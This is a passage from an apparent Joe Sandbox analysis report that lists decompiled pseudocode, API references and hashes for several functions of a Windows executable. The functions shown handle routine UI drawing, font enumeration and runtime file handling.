						E00CAA4E7(0, _t91, _t111, _t114, __eflags);
						asm("int3");
						_push(0);
						_push(_t114);
						_push(_t111);
						_t112 = _v28;
						_t115 = _t91;
						E00D7CA5A(_t91, _t112);
						__eflags =  *(_t112 + 0x18) & 0x00000001;
						_t53 = _t115 + 0x70;
						_t83 = _t115 + 0x74;
						_t92 = _t112;
						if(( *(_t112 + 0x18) & 0x00000001) == 0) {
							E00CAE56E(_t83, _t92, _t109, _t112);
							E00CAE56E(_t83, _t112, _t109, _t112,  *((intOrPtr*)(_t115 + 0x8c)),  *_t53);
							E00CAE56E(_t83, _t112, _t109, _t112);
							E00CAA81C(_t83, _t112, _t109, _t115 + 0xb8);
							E00CAE56E(_t83, _t112, _t109, _t112,  *((intOrPtr*)(_t115 + 0x78)),  *_t83);
							E00CAE56E(_t83, _t112, _t109, _t112);
							_t62 = E00CAE4E3(_t83, _t112, _t109, _t112,  *(_t115 + 0xf8) & 0x000000ff,  *((intOrPtr*)(_t115 + 0xf4)));
						} else {
							E00CAE449(_t83, _t92, _t112);
							 *((intOrPtr*)(_t115 + 0x5c)) =  *((intOrPtr*)(_t115 + 0x54)) +  *((intOrPtr*)(_t115 + 0x70));
							E00CAE449(_t83, _t112, _t112, _t115 + 0x8c, _t53);
							E00CAE449(_t83, _t112, _t112);
							E00CAA6C6(_t83, _t112, _t109, _t112, _t115, __eflags, _t115 + 0xb8, _t83);
							E00CAE449(_t83, _t112, _t112);
							E00CAE449(_t83, _t112, _t112, _t115 + 0xf4, _t115 + 0x78);
							_push(_t115 + 0xf8);
							E00CAE3B4(_t83, _t112, _t112);
							__eflags =  *0xe885ec;
							if(__eflags == 0) {
								E00D21697(_t83, _t115, _t109, _t112, _t115, __eflags);
							}
							E00D21857(_t83, _t115, _t112, _t115, __eflags);
							_push(1);
							_push( *_t83);
							_t62 = E00D209EA(_t83, _t115, _t112, _t115, __eflags);
						}
						return _t62;
					} else {
						EnumFontFamiliesExA(_t114,  &_v76, 0xd214fb, _t111, 0);
						DeleteObject(_t114);
						goto L3;
					}
				}
			}

0x00d21697
0x00d21697
0x00d21697
0x00d216a1
0x00d216a6
0x00d216ae
0x00d216b8
0x00d216bd
0x00d216cb
0x00d216dc
0x00d216e2
0x00d216e3
0x00d216e8
0x00d216ef
0x00d216f4
0x00d2170d
0x00d21739
0x00d2173f
0x00d21749
0x00d21751
0x00d2175b
0x00d2170f
0x00d2170f
0x00d2171a
0x00d2171e
0x00d2175c
0x00d21761
0x00d21765
0x00d21766
0x00d21767
0x00d21768
0x00d2176b
0x00d2176e
0x00d21773
0x00d21777
0x00d2177a
0x00d2177d
0x00d2177f
0x00d21801
0x00d2180e
0x00d21817
0x00d21825
0x00d2182f
0x00d2183c
0x00d2184b
0x00d21781
0x00d21782
0x00d2178f
0x00d21799
0x00d217a1
0x00d217af
0x00d217ba
0x00d217c8
0x00d217d3
0x00d217d6
0x00d217db
0x00d217e2
0x00d217e6
0x00d217e6
0x00d217ed
0x00d217f2
0x00d217f4
0x00d217f8
0x00d217f8
0x00d21854
0x00d21720
0x00d2172c
0x00d21733
0x00000000
0x00d21733
0x00d2171e

APIs

__EH_prolog3_GS.LIBCMT ref: 00D216A1

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

EnumFontFamiliesExA.GDI32(?,?,00D2156B,?,00000000), ref: 00D216DC

Part of subcall function 00D9E113: __EH_prolog3.LIBCMT ref: 00D9E11A

Part of subcall function 00D9DE69: GlobalUnlock.KERNEL32(?,00000000,?,?,00D2170B,?,00000000,0014000C,00000000,?,00000000), ref: 00D9DE97
Part of subcall function 00D9DE69: GlobalUnlock.KERNEL32(?,?,?,00D2170B,?,00000000,0014000C,00000000,?,00000000), ref: 00D9DEA0

EnumFontFamiliesExA.GDI32(00000000,?,00D214FB,?,00000000), ref: 00D2172C
DeleteObject.GDI32(00000000), ref: 00D21733

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: EnumFamiliesFontGlobalH_prolog3Unlock$DeleteH_prolog3_ObjectWindow
String ID:
API String ID: 2572162-0
Opcode ID: 4f0fad87ce7ef47350479fb14d00727d590c68484e94b179ce28adde44d23c23
Instruction ID: 9ceecf2a47303c816a2b4ea6645d3f0635ff0d5e4d8d1df5029293edef5afa34
Opcode Fuzzy Hash: 4f0fad87ce7ef47350479fb14d00727d590c68484e94b179ce28adde44d23c23
Instruction Fuzzy Hash: CD41F634600609ABCB21EBA0DC96EFF77BEEF95308F088419F54653251DF345908EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CD6786 Relevance: 6.1, APIs: 4, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00CD6786(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				void* _t42;
				struct HBRUSH__* _t43;
				void* _t45;
				intOrPtr _t54;
				void* _t56;
				void* _t59;
				intOrPtr _t64;
				void* _t67;
				void* _t78;
				void* _t83;
				intOrPtr* _t100;
				void* _t109;
				RECT* _t113;
				void* _t117;
				void* _t118;

				_t118 = __eflags;
				_t105 = __edx;
				_push(0x6c);
				E00DDD55F(0xe0a224, __ebx, __edi, __esi);
				_t83 = __ecx;
				_push(__ecx);
				E00CB9046(__ecx, _t117 - 0x74, __edx, __edi, __esi, _t118);
				 *(_t117 - 4) =  *(_t117 - 4) & 0x00000000;
				_t41 = E00CC19ED();
				_t113 = _t83 + 0xf4;
				_t42 = _t41 + 0x98;
				if(_t42 != 0) {
					_t43 =  *(_t42 + 4);
				} else {
					_t43 = 0;
				}
				FillRect( *(_t117 - 0x70), _t113, _t43);
				_t45 = E00CC19ED();
				E00CC0750(_t113,  *((intOrPtr*)(E00CC19ED() + 0x20)),  *((intOrPtr*)(_t45 + 0x24)));
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				InflateRect(_t117 - 0x20, 0xfffffffb, 0);
				E00CBA3B4(_t117 - 0x74, 1);
				if(E00CB7881(_t83) == 0) {
					_t54 =  *((intOrPtr*)(E00CC19ED() + 0x38));
				} else {
					_t54 =  *((intOrPtr*)(E00CC19ED() + 0x28));
				}
				_t89 = _t117 - 0x74;
				E00CBA4ED(_t117 - 0x74, _t105, _t54);
				_t56 = _t83 + 0x104;
				_t109 = 0;
				if(_t56 == 0 ||  *((intOrPtr*)(_t56 + 4)) == 0) {
					_t59 = E00CCDE3C(E00CB277F(_t83, _t89, _t105, GetParent( *(_t83 + 0x20))));
					__eflags = _t59;
					if(_t59 == 0) {
						goto L9;
					} else {
						_t100 = _t117 - 0x74;
						_t109 = E00CBA2B8(_t100, _t59);
						__eflags = _t109;
						if(__eflags == 0) {
							E00CAA4E7(_t83, _t100, _t109, _t113, __eflags);
							asm("int3");
							 *0xe17a64(_t109, _t113);
							_t78 = E00CB277F(_t83, _t100, _t105,  *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x1c4))))());
							__eflags = _t78;
							if(_t78 != 0) {
								return E00CB7A0A(_t83, _t78, _t105);
							}
							return _t78;
						} else {
							goto L9;
						}
					}
				} else {
					_t109 = E00CBA2B8(_t117 - 0x74, _t56);
					L9:
					E00CA67E1(_t117 - 0x78);
					 *(_t117 - 4) = 1;
					if( *((intOrPtr*)(_t83 + 0xe8)) == 0) {
						E00CA68A8(_t117 - 0x78, _t83 + 0x10c);
					} else {
						E00CB2D00(_t83, _t117 - 0x78);
					}
					_t64 =  *((intOrPtr*)(_t117 - 0x78));
					_t114 =  *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x74)) + 0x68));
					 *0xe17a64(_t64,  *((intOrPtr*)(_t64 - 0xc)), _t117 - 0x20, 0x24);
					_t67 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t117 - 0x74)) + 0x68))))();
					if(_t109 != 0) {
						_t67 = E00CBA2B8(_t117 - 0x74, _t109);
					}
					E00CA2975(_t67,  *((intOrPtr*)(_t117 - 0x78)) - 0x10);
					E00CB92FC(_t117 - 0x74);
					return E00DDD50E(_t83, _t109, _t114);
				}
			}

0x00cd6786
0x00cd6786
0x00cd6786
0x00cd678d
0x00cd6792
0x00cd6794
0x00cd6798
0x00cd679d
0x00cd67a1
0x00cd67a6
0x00cd67ac
0x00cd67b1
0x00cd67b7
0x00cd67b3
0x00cd67b3
0x00cd67b3
0x00cd67bf
0x00cd67c5
0x00cd67db
0x00cd67e3
0x00cd67ec
0x00cd67ed
0x00cd67ee
0x00cd67ef
0x00cd67fa
0x00cd6808
0x00cd6819
0x00cd680a
0x00cd680f
0x00cd680f
0x00cd681d
0x00cd6820
0x00cd6825
0x00cd682b
0x00cd682f
0x00cd6874
0x00cd6879
0x00cd687b
0x00000000
0x00cd687d
0x00cd687e
0x00cd6886
0x00cd6888
0x00cd688a
0x00cd68e3
0x00cd68e8
0x00cd68f7
0x00cd6902
0x00cd6909
0x00cd690b
0x00000000
0x00cd690f
0x00cd6914
0x00cd688c
0x00000000
0x00cd688c
0x00cd688a
0x00cd6836
0x00cd683f
0x00cd6841
0x00cd6844
0x00cd6850
0x00cd6854
0x00cd6898
0x00cd6856
0x00cd685c
0x00cd685c
0x00cd68a3
0x00cd68ad
0x00cd68b2
0x00cd68bb
0x00cd68bf
0x00cd68c5
0x00cd68c5
0x00cd68d0
0x00cd68d8
0x00cd68e2
0x00cd68e2

APIs

__EH_prolog3_GS.LIBCMT ref: 00CD678D

Part of subcall function 00CB9046: __EH_prolog3.LIBCMT ref: 00CB904D
Part of subcall function 00CB9046: BeginPaint.USER32(?,?,00000004,00CB3CE8), ref: 00CB9079

FillRect.USER32 ref: 00CD67BF
InflateRect.USER32(?,000000FB,00000000), ref: 00CD67EF
GetParent.USER32(?), ref: 00CD6866

Part of subcall function 00CCDE3C: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 00CCDE45

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect$BeginFillH_prolog3H_prolog3_InflateMessagePaintParentSend
String ID:
API String ID: 1694966241-0
Opcode ID: 8de6762eb01ebd48959ebe42cbc346bd34ed3bd90df0cccf79914e558ce3928e
Instruction ID: 10c17d293a6a157f11fb40a4e37ac19b2ca7de375421dfe199dce40bb0406589
Opcode Fuzzy Hash: 8de6762eb01ebd48959ebe42cbc346bd34ed3bd90df0cccf79914e558ce3928e
Instruction Fuzzy Hash: 37418A315001059FDF15EBB5CD96EEE77B9AF55300F24013AF906AB2A2DE34AE04EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00CC6D38 Relevance: 6.1, APIs: 4, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00CC6D38(intOrPtr __ecx, void* __eflags, void* __fp0, void* _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, intOrPtr _a20, void* _a24) {
				int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v26;
				intOrPtr _v36;
				signed int _v40;
				void _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t45;
				intOrPtr _t52;
				intOrPtr _t57;
				signed int _t58;
				void* _t59;
				signed int _t60;
				void* _t68;
				void* _t71;
				intOrPtr _t72;
				int _t75;
				intOrPtr _t76;
				intOrPtr _t77;
				intOrPtr _t78;
				intOrPtr _t81;
				void* _t103;

				_t103 = __fp0;
				_t77 = __ecx;
				_v16 = __ecx;
				_t45 = E00CC54AE(__ecx, _a20);
				if(_a4 == 0) {
					L38:
					return _t45;
				} else {
					_v20 = (0 | _a24 != 0x00000000) + 2;
					_t81 = 0;
					do {
						if(_t81 != 0) {
							_t68 = _a12;
							__eflags = _t81 - 1;
							if(_t81 != 1) {
								_t68 = _a24;
							}
						} else {
							_t68 = _a4;
						}
						if(_a20 == 0) {
							__eflags = _t81;
							if(_t81 != 0) {
								_t13 = _t81 - 1; // -1
								asm("sbb eax, eax");
								_t52 = ( ~_t13 & 0x00000118) + 0x208;
								__eflags = _t52;
							} else {
								_t52 = 0xf0;
							}
						} else {
							if(_t81 != 0) {
								_t12 = _t81 - 1; // -1
								asm("sbb eax, eax");
								_t52 = ( ~_t12 & 0x00000118) + 0x550;
							} else {
								_t52 = 0x438;
							}
						}
						_t45 = _t52 + _t77;
						_v8 = _t45;
						if(_t68 == 0) {
							break;
						} else {
							GetObjectA(_t68, 0x18,  &_v44);
							_t57 = _a16;
							_t71 = 0x20;
							if(_t57 != 0 || _v26 > 8 && _v26 < _t71) {
								_v12 = 1;
								__eflags = _t57;
								if(_t57 != 0) {
									goto L22;
								}
								goto L19;
							} else {
								_v12 = _v12 & 0x00000000;
								L19:
								if(_v26 != _t71 || E00CA3447() == 0) {
									L22:
									_t78 = 0;
									__eflags = 0;
								} else {
									_t78 = 1;
								}
								goto L23;
							}
						}
						L23:
						_t72 = _v36;
						_t58 = _v40;
						if(_t81 == 0) {
							_t76 = _v16;
							 *(_t76 + 0xe0) = _t58;
							 *((intOrPtr*)(_t76 + 0xe4)) = _t72;
						}
						if(_t78 != 0) {
							E00CDE938(_t78, _t68, 1);
							_t72 = _v36;
							_t58 = _v40;
						}
						_t98 = _v12;
						_t75 = _v8;
						 *(_t75 + 0x54) = _t58;
						 *((intOrPtr*)(_t75 + 0x58)) = _t72;
						if(_v12 == 0) {
							__eflags = _t78;
							if(_t78 == 0) {
								_t59 = E00CC19ED();
								_t75 = _v8;
								_t60 =  *(_t59 + 0x1c);
							} else {
								_t60 = _t58 | 0xffffffff;
							}
						} else {
							_t60 = 0xc0c0c0;
						}
						E00CC71EE(_t75, _t60);
						_push(1);
						_push(_t68);
						_t45 = L00CDAB41(_t68, _v8, _t78, _t81, _t98, _t103);
						_t77 = _v16;
						_t81 = _t81 + 1;
					} while (_t81 < _v20);
					if(_a8 == 0) {
						goto L38;
					}
					if(_a12 != 0) {
						DeleteObject(_a12);
					}
					_t45 = DeleteObject(_a4);
					if(_a24 == 0) {
						goto L38;
					} else {
						return DeleteObject(_a24);
					}
				}
			}

0x00cc6d38
0x00cc6d42
0x00cc6d44
0x00cc6d47
0x00cc6d50
0x00cc6eba
0x00cc6eba
0x00cc6d56
0x00cc6d63
0x00cc6d66
0x00cc6d68
0x00cc6d6a
0x00cc6d71
0x00cc6d74
0x00cc6d77
0x00cc6d79
0x00cc6d79
0x00cc6d6c
0x00cc6d6c
0x00cc6d6c
0x00cc6d80
0x00cc6da0
0x00cc6da2
0x00cc6dab
0x00cc6db0
0x00cc6db7
0x00cc6db7
0x00cc6da4
0x00cc6da4
0x00cc6da4
0x00cc6d82
0x00cc6d84
0x00cc6d8d
0x00cc6d92
0x00cc6d99
0x00cc6d86
0x00cc6d86
0x00cc6d86
0x00cc6d84
0x00cc6dbc
0x00cc6dbe
0x00cc6dc3
0x00000000
0x00cc6dc9
0x00cc6dd0
0x00cc6dd6
0x00cc6ddb
0x00cc6dde
0x00cc6df3
0x00cc6dfa
0x00cc6dfc
0x00000000
0x00000000
0x00000000
0x00cc6ded
0x00cc6ded
0x00cc6dfe
0x00cc6e02
0x00cc6e12
0x00cc6e12
0x00cc6e12
0x00cc6e0d
0x00cc6e0f
0x00cc6e0f
0x00000000
0x00cc6e02
0x00cc6dde
0x00cc6e14
0x00cc6e14
0x00cc6e17
0x00cc6e1c
0x00cc6e1e
0x00cc6e21
0x00cc6e27
0x00cc6e27
0x00cc6e2f
0x00cc6e34
0x00cc6e39
0x00cc6e3c
0x00cc6e3c
0x00cc6e3f
0x00cc6e43
0x00cc6e46
0x00cc6e49
0x00cc6e4c
0x00cc6e55
0x00cc6e57
0x00cc6e5e
0x00cc6e63
0x00cc6e66
0x00cc6e59
0x00cc6e59
0x00cc6e59
0x00cc6e4e
0x00cc6e4e
0x00cc6e4e
0x00cc6e6c
0x00cc6e74
0x00cc6e76
0x00cc6e77
0x00cc6e7c
0x00cc6e7f
0x00cc6e80
0x00cc6e8f
0x00000000
0x00000000
0x00cc6e95
0x00cc6e9a
0x00cc6e9a
0x00cc6ea3
0x00cc6ead
0x00000000
0x00cc6eaf
0x00000000
0x00cc6eb2
0x00cc6ead

APIs

GetObjectA.GDI32(?,00000018,?), ref: 00CC6DD0
DeleteObject.GDI32(00000000), ref: 00CC6E9A
DeleteObject.GDI32(00000000), ref: 00CC6EA3
DeleteObject.GDI32(00000000), ref: 00CC6EB2

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Delete
String ID:
API String ID: 774837909-0
Opcode ID: b1c8a7ed63a21dbd7e4cff15c72ff2a11e979505e2ad1888f138abaa4ef494cd
Instruction ID: 3465bffa371ff28e8aaa884aac266187e42b457ab3ed3f44048086f8a9a1e79b
Opcode Fuzzy Hash: b1c8a7ed63a21dbd7e4cff15c72ff2a11e979505e2ad1888f138abaa4ef494cd
Instruction Fuzzy Hash: 38416D35A0420A9BDF20DF65CA45FEEB7B5AB44300F14412EE922A7281D774CE85DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00E06967 Relevance: 6.1, APIs: 4, Instructions: 132
fileCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 94%

			E00E06967(signed int __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v20;
				int _v24;
				int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				int _t30;
				signed int _t31;
				intOrPtr* _t36;
				int _t40;
				int _t41;
				void* _t42;
				void* _t54;
				void* _t56;
				signed int _t58;
				intOrPtr _t59;
				int _t60;
				void* _t62;
				void* _t63;
				int _t68;

				_t58 = __edx;
				_t50 = _a4;
				E00E0691A( &_v44, __edx, _a4, _a8, _a12);
				if((_v44 & _v40) == 0xffffffff || (_v36 & _v32) == 0xffffffff) {
					L28:
					_t59 =  *((intOrPtr*)(E00DE58BA(__eflags)));
					goto L29;
				} else {
					_t30 = _v24;
					_t60 = _v28;
					_v8 = _t30;
					_t68 = _t30;
					if(_t68 < 0) {
						L25:
						_t31 = E00DF8A6F(_t50, _a8, _a12, 0);
						_t63 = _t63 + 0x10;
						__eflags = (_t31 & _t58) - 0xffffffff;
						if(__eflags == 0) {
							goto L28;
						}
						__eflags = SetEndOfFile(E00DED873(_t50));
						if(__eflags != 0) {
							L18:
							_t59 = 0;
							L29:
							E00DF8A6F(_v20, _v44, _v40, 0);
							return _t59;
						}
						 *((intOrPtr*)(E00DE58BA(__eflags))) = 0xd;
						_t36 = E00DE58A7(__eflags);
						 *_t36 = GetLastError();
						goto L28;
					}
					if(_t68 > 0 || _t60 != 0) {
						_t62 = E00DF5650(0x1000, 1);
						_pop(_t54);
						_t70 = _t62;
						if(_t62 != 0) {
							_v12 = E00DF231C(_t54, _t50, 0x8000);
							_t40 = _v24;
							_pop(_t56);
							do {
								__eflags = _t40;
								if(__eflags < 0) {
									L12:
									_t41 = _t60;
									L13:
									_t42 = E00DF784D(_t50, _t62, _t41);
									_t63 = _t63 + 0xc;
									__eflags = _t42 - 0xffffffff;
									if(__eflags == 0) {
										__eflags =  *((intOrPtr*)(E00DE58A7(__eflags))) - 5;
										if(__eflags == 0) {
											 *((intOrPtr*)(E00DE58BA(__eflags))) = 0xd;
										}
										L21:
										_t59 =  *((intOrPtr*)(E00DE58BA(_t70)));
										E00DF47C5(_t62);
										goto L29;
									}
									asm("cdq");
									_t60 = _t60 - _t42;
									_t40 = _v8;
									asm("sbb eax, edx");
									_v8 = _t40;
									__eflags = _t40;
									if(__eflags > 0) {
										L11:
										_t41 = 0x1000;
										goto L13;
									}
									if(__eflags < 0) {
										break;
									}
									goto L16;
								}
								if(__eflags > 0) {
									goto L11;
								}
								__eflags = _t60 - 0x1000;
								if(_t60 < 0x1000) {
									goto L12;
								}
								goto L11;
								L16:
								__eflags = _t60;
							} while (_t60 != 0);
							E00DF231C(_t56, _t50, _v12);
							E00DF47C5(_t62);
							_t63 = _t63 + 0xc;
							goto L18;
						}
						 *((intOrPtr*)(E00DE58BA(_t70))) = 0xc;
						goto L21;
					} else {
						__eflags = _t30;
						if(__eflags > 0) {
							goto L18;
						}
						if(__eflags < 0) {
							goto L25;
						}
						__eflags = _t60;
						if(_t60 >= 0) {
							goto L18;
						}
						goto L25;
					}
				}
			}

0x00e06967
0x00e06970
0x00e0697f
0x00e0698d
0x00e06ab6
0x00e06abb
0x00000000
0x00e069a2
0x00e069a2
0x00e069a5
0x00e069a8
0x00e069ab
0x00e069ad
0x00e06a72
0x00e06a7b
0x00e06a82
0x00e06a85
0x00e06a88
0x00000000
0x00000000
0x00e06a98
0x00e06a9a
0x00e06a3f
0x00e06a3f
0x00e06abd
0x00e06ac8
0x00e06ad6
0x00e06ad6
0x00e06aa1
0x00e06aa7
0x00e06ab4
0x00000000
0x00e06ab4
0x00e069b3
0x00e069c9
0x00e069cc
0x00e069cd
0x00e069cf
0x00e069ea
0x00e069ed
0x00e069f0
0x00e069f1
0x00e069f1
0x00e069f3
0x00e06a06
0x00e06a06
0x00e06a08
0x00e06a0b
0x00e06a10
0x00e06a13
0x00e06a16
0x00e06a48
0x00e06a4b
0x00e06a52
0x00e06a52
0x00e06a58
0x00e06a5e
0x00e06a60
0x00000000
0x00e06a65
0x00e06a18
0x00e06a19
0x00e06a1b
0x00e06a1e
0x00e06a20
0x00e06a23
0x00e06a25
0x00e069ff
0x00e069ff
0x00000000
0x00e069ff
0x00e06a27
0x00000000
0x00000000
0x00000000
0x00e06a27
0x00e069f5
0x00000000
0x00000000
0x00e069f7
0x00e069fd
0x00000000
0x00000000
0x00000000
0x00e06a29
0x00e06a29
0x00e06a29
0x00e06a31
0x00e06a37
0x00e06a3c
0x00000000
0x00e06a3c
0x00e069d6
0x00000000
0x00e06a68
0x00e06a68
0x00e06a6a
0x00000000
0x00000000
0x00e06a6c
0x00000000
0x00000000
0x00e06a6e
0x00e06a70
0x00000000
0x00000000
0x00000000
0x00e06a70
0x00e069b3

APIs

_free.LIBCMT ref: 00E06A37
_free.LIBCMT ref: 00E06A60
SetEndOfFile.KERNEL32(00000000,00E04B76,00000000,00DF8C03,?,?,?,?,?,?,?,00E04B76,00DF8C03,00000000), ref: 00E06A92
GetLastError.KERNEL32(?,?,?,?,?,?,?,00E04B76,00DF8C03,00000000,?,?,?,?,00000000,?), ref: 00E06AAE

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: 2a8f795f19ae7475001045862282f79601074d3f3a1d4927417bb3dd79f1523b
Instruction ID: e8f49f52dbd1591dad1c2e7cdefbc9848fe555c467b15dee7b38a7fefb7a0f71
Opcode Fuzzy Hash: 2a8f795f19ae7475001045862282f79601074d3f3a1d4927417bb3dd79f1523b
Instruction Fuzzy Hash: 5D41D432A00645ABDB11BBB9CC46B9E37B5EF44368F25A110F515F72E2EA34CDA08771

Uniqueness

Uniqueness Score: -1.00%

Function 00D12D79 Relevance: 6.1, APIs: 4, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E00D12D79(void* __ecx, void* __edx) {
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t68;
				void* _t69;
				signed int _t75;
				intOrPtr* _t82;
				void* _t86;
				signed int _t87;
				int _t92;
				void* _t94;
				void* _t97;
				void* _t105;
				void* _t106;
				void* _t115;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = __edx;
				_push(__ecx);
				_push(__ecx);
				_push(_t106);
				_t97 = __ecx;
				_t68 = E00CC19ED();
				_t118 =  *((intOrPtr*)(_t68 + 0x19c));
				if( *((intOrPtr*)(_t68 + 0x19c)) != 0) {
					 *((char*)(_t97 + 0x24)) = 1;
				}
				_t69 = E00CC19ED();
				asm("sbb eax, eax");
				 *0xe885b8 =  *0xe885b8 &  !( ~( *(_t69 + 0x180)));
				 *((intOrPtr*)(_t97 + 0xf34)) = 0;
				 *((intOrPtr*)(_t97 + 0x138)) = 0;
				 *((intOrPtr*)(_t97 + 0x13c)) = 0;
				 *((intOrPtr*)(_t97 + 0x140)) = 0;
				 *((intOrPtr*)(_t97 + 0x144)) = 0;
				 *((intOrPtr*)(_t97 + 0x158)) = 0;
				 *((intOrPtr*)(_t97 + 0x130)) = 1;
				 *((intOrPtr*)(_t97 + 0xf38)) = 1;
				 *((intOrPtr*)(_t97 + 0x148)) = 0;
				 *((intOrPtr*)(_t97 + 0x14c)) = 0;
				 *((intOrPtr*)(_t97 + 0xf64)) = 0;
				 *((intOrPtr*)(_t97 + 0xf68)) = 0;
				 *((intOrPtr*)(_t97 + 0xf50)) = 0;
				_t75 = E00CF133D(0);
				 *((intOrPtr*)(_t97 + 0xf78)) = 0;
				 *((intOrPtr*)(_t97 + 0xf7c)) = 0;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t97 + 0xf80)) = 0;
				 *(_t97 + 0xfac) =  *(_t97 + 0xfac) | 0xffffffff;
				 *(_t97 + 0xf54) =  *(_t97 + 0xf54) | 0xffffffff;
				 *((intOrPtr*)(_t97 + 0xf74)) =  ~_t75 + 1;
				 *((intOrPtr*)(_t97 + 0xf4c)) = 0;
				 *((intOrPtr*)(_t97 + 0xf48)) = 0;
				 *((intOrPtr*)(_t97 + 0xf58)) = 0;
				 *((intOrPtr*)(_t97 + 0xf60)) = 0;
				SetRectEmpty(_t97 + 0xf84);
				SetRectEmpty(_t97 + 0xf94);
				_t82 = E00CC1A50(_t97, _t106, 0, _t118);
				_t107 = _t82;
				 *0xe17a64();
				_t115 =  *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x2f4))))() + _t84;
				_t86 = E00D0A216(_t82, _t105, _t107, _t115,  &_v12);
				 *((intOrPtr*)(_t97 + 0xf6c)) = 1;
				 *((intOrPtr*)(_t97 + 0xfa8)) =  *((intOrPtr*)(_t86 + 4)) + _t115;
				 *((intOrPtr*)(_t97 + 0xfa4)) = 0;
				 *((intOrPtr*)(_t97 + 0xf70)) = 1;
				_t119 =  *0xe688f4; // 0x1
				if(_t119 == 0) {
					L6:
					_t87 = 0;
				} else {
					_t120 =  *0xe8738c; // 0x0
					if(_t120 != 0) {
						goto L6;
					} else {
						_t94 = E00CC19ED();
						_t121 =  *((intOrPtr*)(_t94 + 0x1ac)) - 8;
						if( *((intOrPtr*)(_t94 + 0x1ac)) <= 8) {
							goto L6;
						} else {
